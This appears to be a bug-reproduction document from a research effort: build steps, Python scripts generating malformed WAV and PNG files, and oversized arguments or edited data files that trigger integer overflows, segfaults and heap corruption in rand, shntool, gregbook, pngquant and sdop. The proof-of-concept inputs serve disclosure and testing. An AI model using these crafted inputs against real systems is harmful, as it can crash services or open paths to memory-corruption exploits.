Program inputs that trigger the integer overflow bugs we found

Our test environment is 32-bit Ubuntu 14.04.

  1. rand
    $ wget http://archive.ubuntu.com/ubuntu/pool/universe/r/rand/rand_1.0.4.orig.tar.gz
    $ tar xzvf rand_1.0.4.orig.tar.gz
    $ cd rand-1.0.4/
    $ make
    $ ./rand -N 1073741825 -M 1073741829 -u > /dev/null
    Segmentation fault (core dumped)

  2. shntool
    $ wget http://www.etree.org/shnutils/shntool/dist/src/shntool-3.0.10.tar.gz
    $ tar xzvf shntool-3.0.10.tar.gz
    $ cd shntool-3.0.10/
    $ ./configure && make
    $ cd src/
    $ cat exploit.py

    # Python 2 script: it relies on str and bytes being the same type (the
    # struct.pack results are concatenated with string literals) and on "/"
    # being integer division.  It writes a minimal PCM WAV file to stdout.
    import struct  
    import sys  
    
    # WAV format parameters: mono, 32-bit samples, an unusually low sample rate
    # of 4 Hz, and 3 seconds of audio.  BYTE_RATE is the number of sample bytes
    # per second.  Per the note after this listing, shntool's cmp mode multiplies
    # a shift in seconds (presumably the -c argument) by the file's rate at
    # mode_cmp.c line 312 and uses the product as a malloc() size, so the small
    # rate here is what lets a large -c value overflow 32-bit arithmetic.
    CHANNEL = 1  
    BITS_PER_SAMPLE = 32  
    SAMPLE_RATE = 0x4  
    DURATION = 3  
    BYTE_RATE = SAMPLE_RATE * CHANNEL * BITS_PER_SAMPLE / 8  
    
    # RIFF chunk.  The size field counts everything after itself: 12 + 24 = 36
    # header bytes ("WAVE", the 24-byte fmt chunk, the 8-byte data chunk header)
    # plus the sample data.  All multi-byte fields are little-endian ("<").
    riff_sig = "RIFF"  
    riff_size = struct.pack("<I", 12 + 24 + DURATION * BYTE_RATE)  
    riff_format = "WAVE"  
    riff_header = riff_sig + riff_size + riff_format  
    
    # "fmt " chunk: a 16-byte PCM descriptor (audio_format 1 = PCM).  block_align
    # uses Python 2 integer division like BYTE_RATE above.
    header_sig = "fmt "  
    header_size = struct.pack("<I", 16)  
    audio_format = "\x01\x00"  
    channel_no = struct.pack("<H", CHANNEL)  
    sample_rate = struct.pack("<I", SAMPLE_RATE)  
    byte_rate = struct.pack("<I", BYTE_RATE)  
    block_align = struct.pack("<H", CHANNEL * BITS_PER_SAMPLE / 8)  
    bits_per_sample = struct.pack("<H", BITS_PER_SAMPLE)  
    header = header_sig + header_size + audio_format + channel_no + sample_rate + byte_rate + block_align + bits_per_sample  
    
    # "data" chunk: a length field followed by DURATION * BYTE_RATE bytes of
    # filler ("a") sample data, consistent with the RIFF size computed above.
    data_sig = "data"  
    
    data_header = struct.pack("<I",  DURATION * BYTE_RATE)  
    
    data_body = "a" * DURATION * BYTE_RATE  
    
    data = data_sig + data_header + data_body  
    
    content = riff_header + header + data  
    
    # Raw bytes to stdout; the transcript redirects this into poc.wav.
    sys.stdout.write(content)  
    

    $ python exploit.py > poc.wav

    2.1 (alarm1, alarm8, alarm18)
    $ ./shntool cmp -c 134217729 poc.wav poc.wav
    Comparing [poc.wav] (0:03.000) and [poc.wav] (0:03.000) : 100% Segmentation fault (core dumped)

    2.2 (alarm2, alarm15, alarm19)
    $ ./shntool cmp -s -c 268435457 poc.wav poc.wav
    Scanning [poc.wav] and [poc.wav] : 100% OK

    Files are identical so far.

    Preparing to do a full comparison...

    Comparing [poc.wav] (0:03.000) and [poc.wav] (0:03.000) : 100% OK

    Contents of these files are identical.

    (Note)
    In this case no segmentation fault is observed, but you can insert
    'printf("bytes = %x * %x = %x\n", shift_secs, info1->rate, bytes);'
    at line 314 of mode_cmp.c to observe that the integer overflow really
    occurs at line 312 and that the overflowed value is used as the malloc() size.

  3. gregbook
    (alarm3 plus one of alarm7-alarm10: the X configuration (the 'Depth' field of '/etc/X11/xorg.conf') decides which one of alarm7-alarm10 is triggered.)
    $ wget https://sourceforge.net/projects/libpng/files/libpng16/older-releases/1.6.21/libpng-1.6.21.tar.gz
    $ tar xzvf libpng-1.6.21.tar.gz
    $ cd libpng-1.6.21/
    $ ./configure && make && sudo make install
    $ cd contrib/gregbook/
    $ cp Makefile.unx Makefile
    $ make rpng-x
    $ cat exploit.py

    # Python 2 script: string literals are concatenated directly with the
    # struct.pack and zlib output, and the CRC is packed with ">i" because
    # Python 2's zlib.crc32 returns a signed int.  Writes a PNG to stdout.
    import zlib  
    import struct  
    import sys  
    
    # The declared dimensions are the trigger: 8192 * 524289 = 2**32 + 8192, so a
    # 32-bit pixel-count or buffer-size computation wraps to a tiny value.  Which
    # of alarm7-alarm10 fires depends on the X display depth, per the note above
    # this listing.
    width = 8192  
    height = 524288 + 1  
    
    # 8-byte PNG signature.
    HEADER = "\x89\x50\x4e\x47\x0d\x0a\x1a\x0a"  
    
    # IHDR fields: 16-bit depth, colour type 6 (RGBA), compression 0 (deflate),
    # filter method 0, no interlace.  Chunk integers are big-endian (">").
    width_field = struct.pack(">i", width)  
    height_field = struct.pack(">i", height)  
    bit_depth = "\x10"  
    color_type = "\x06"  
    compression_type = "\x00"  
    filter_type = "\x00"  
    interlace_type = "\x00"  
    
    # IHDR chunk = length, type, data, CRC32 over type + data.
    # NOTE: nothing may follow the "\" line continuation when copying this file.
    IHDR_data = width_field + height_field + bit_depth + color_type + \  
              compression_type + filter_type + interlace_type  
    IHDR_size = struct.pack(">i", len(IHDR_data))  
    IHDR_crc32 = struct.pack(">i", zlib.crc32("IHDR" + IHDR_data))  
    IHDR = IHDR_size + "IHDR" + IHDR_data + IHDR_crc32  
    
    # IDAT: 100 (0x64) filler "rows" of (width * 3 + 1) 0x01 bytes, deflated.
    # This does not match the 16-bit RGBA row length declared in IHDR, and the
    # transcript shows libpng rejecting it ("IDAT: incorrect data check");
    # the heap corruption apparently comes from the IHDR-derived allocation
    # rather than from the pixel data itself.
    dummy_data = "\x01" * (width * 3 + 1)  
    IDAT_data = zlib.compress(dummy_data * 0x64)  
    IDAT_size  = struct.pack(">i", len(IDAT_data))  
    IDAT_crc32 = struct.pack(">i", zlib.crc32("IDAT" + IDAT_data))  
    IDAT = IDAT_size + "IDAT" + IDAT_data + IDAT_crc32  
    
    # Fixed zero-length IEND chunk (length, "IEND", CRC).
    IEND = "\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82"  
    
    # "IDAT * 1" is a no-op left in place; the transcript redirects stdout to poc.png.
    sys.stdout.write(HEADER + IHDR + IDAT * 1 + IEND)  
    

    $ python exploit.py > poc.png
    $ ./rpng-x poc.png
    $ ./pngquant poc.png
    error: IDAT: incorrect data check (libpng failed)
    *** Error in './rpng-x': free(): invalid next size (normal): 0x995d5d8 ***
    Aborted (core dumped)

  4. pngquant
    (alarm3, alarm8)
    $ wget https://sourceforge.net/projects/libpng/files/libpng16/older-releases/1.6.21/libpng-1.6.21.tar.gz
    $ tar xzvf libpng-1.6.21.tar.gz
    $ cd libpng-1.6.21/
    $ ./configure && make && sudo make install
    $ wget http://pngquant.org/pngquant-2.7.0-src.tar.gz
    $ tar xzvf pngquant-2.7.0-src.tar.gz
    $ cd pngquant-2.7.0
    $ ./configure && make
    $ cat exploit.py

    # Python 2 script (same generator as in section 3 with a smaller width):
    # string literals are concatenated directly with struct.pack and zlib
    # output, and the CRC is packed with ">i" because Python 2's zlib.crc32
    # returns a signed int.  Writes a PNG to stdout.
    import zlib  
    import struct  
    import sys  
    
    # Declared dimensions are the trigger: 2048 * 524289 = 2**30 + 2048, which
    # is below 2**32 on its own, so the overflowing computation presumably
    # multiplies by a per-pixel byte count as well (a factor of 4 would wrap
    # it to 8192) -- confirm against the pngquant/libpng source.
    width = 2048  
    height = 524288 + 1  
    
    # 8-byte PNG signature.
    HEADER = "\x89\x50\x4e\x47\x0d\x0a\x1a\x0a"  
    
    # IHDR fields: 16-bit depth, colour type 6 (RGBA), compression 0 (deflate),
    # filter method 0, no interlace.  Chunk integers are big-endian (">").
    width_field = struct.pack(">i", width)  
    height_field = struct.pack(">i", height)  
    bit_depth = "\x10"  
    color_type = "\x06"  
    compression_type = "\x00"  
    filter_type = "\x00"  
    interlace_type = "\x00"  
    
    # IHDR chunk = length, type, data, CRC32 over type + data.
    # NOTE: nothing may follow the "\" line continuation when copying this file.
    IHDR_data = width_field + height_field + bit_depth + color_type + \  
              compression_type + filter_type + interlace_type  
    IHDR_size = struct.pack(">i", len(IHDR_data))  
    IHDR_crc32 = struct.pack(">i", zlib.crc32("IHDR" + IHDR_data))  
    IHDR = IHDR_size + "IHDR" + IHDR_data + IHDR_crc32  
    
    # IDAT: 100 (0x64) filler "rows" of (width * 3 + 1) 0x01 bytes, deflated.
    # This does not match the 16-bit RGBA row length declared in IHDR, and the
    # transcript shows libpng rejecting it ("IDAT: incorrect data check");
    # the invalid-pointer abort apparently comes from the IHDR-derived
    # allocation rather than from the pixel data itself.
    dummy_data = "\x01" * (width * 3 + 1)  
    IDAT_data = zlib.compress(dummy_data * 0x64)  
    IDAT_size  = struct.pack(">i", len(IDAT_data))  
    IDAT_crc32 = struct.pack(">i", zlib.crc32("IDAT" + IDAT_data))  
    IDAT = IDAT_size + "IDAT" + IDAT_data + IDAT_crc32  
    
    # Fixed zero-length IEND chunk (length, "IEND", CRC).
    IEND = "\x00\x00\x00\x00\x49\x45\x4e\x44\xae\x42\x60\x82"  
    
    # "IDAT * 1" is a no-op left in place; the transcript redirects stdout to poc.png.
    sys.stdout.write(HEADER + IHDR + IDAT * 1 + IEND)  
    

    $ python exploit.py > poc.png
    $ ./pngquant poc.png
    error: IDAT: incorrect data check (libpng failed)
    *** Error in './pngquant': munmap_chunk(): invalid pointer: 0x081ae368 ***
    Aborted (core dumped)

  5. sdop

    Caution: you must uninstall the libpng library installed in steps 3 and 4; otherwise the build fails.

    $ wget https://launchpad.net/ubuntu/+archive/primary/+files/sdop_0.61.orig.tar.gz
    $ tar xvzf sdop_0.61.orig.tar.gz
    $ cd sdop-0.61
    $ sed -i 's/sdop \$(SDOBJ)/sdop \$(SDOBJ) \$(LIBS)/g' src/Makefile
    $ ./configure && make && sudo make install

    5.1 (alarm1)
    $ cp /usr/local/share/sdop/HyphenData HyphenData.bak
    $ sudo vim /usr/local/share/sdop/HyphenData
    $ echo "536870912" | sudo tee /usr/local/share/sdop/HyphenData
    $ cat /usr/local/share/sdop/HyphenData
    536870912
    $ sdop
    Segmentation fault (core dumped)
    $ sudo cp HyphenData.bak /usr/local/share/sdop/HyphenData

    5.2 (alarm3)
    $ cp /usr/local/share/sdop/fontmetrics/Times-Roman.afm Times-Roman.afm.bak
    $ sudo sed -i '/StartCharMetrics/,/EndCharMetrics/{//!d}' /usr/local/share/sdop/fontmetrics/Times-Roman.afm
    $ sudo sed -i 's/StartCharMetrics 314/StartCharMetrics/g' /usr/local/share/sdop/fontmetrics/Times-Roman.afm
    $ sudo sed -i 's/StartKernPairs 2073/StartKernPairs 536870913/g' /usr/local/share/sdop/fontmetrics/Times-Roman.afm
    $ cat poc.doc

    <section>  
    </section>  
    

    $ sdop poc.doc
    Segmentation fault (core dumped)
    $ sudo cp Times-Roman.afm.bak /usr/local/share/sdop/fontmetrics/Times-Roman.afm

    5.3 (alarm5, alarm6)
    $ cp /usr/local/share/sdop/indexcollate indexcollate.bak
    $ python -c 'print "7fffffff\n10000000"' | sudo tee /usr/local/share/sdop/indexcollate
    $ cat poc.doc

    <indexterm>term</indexterm>  
    <index role="">idx</index>  
    

    $ sdop poc.doc
    Segmentation fault (core dumped)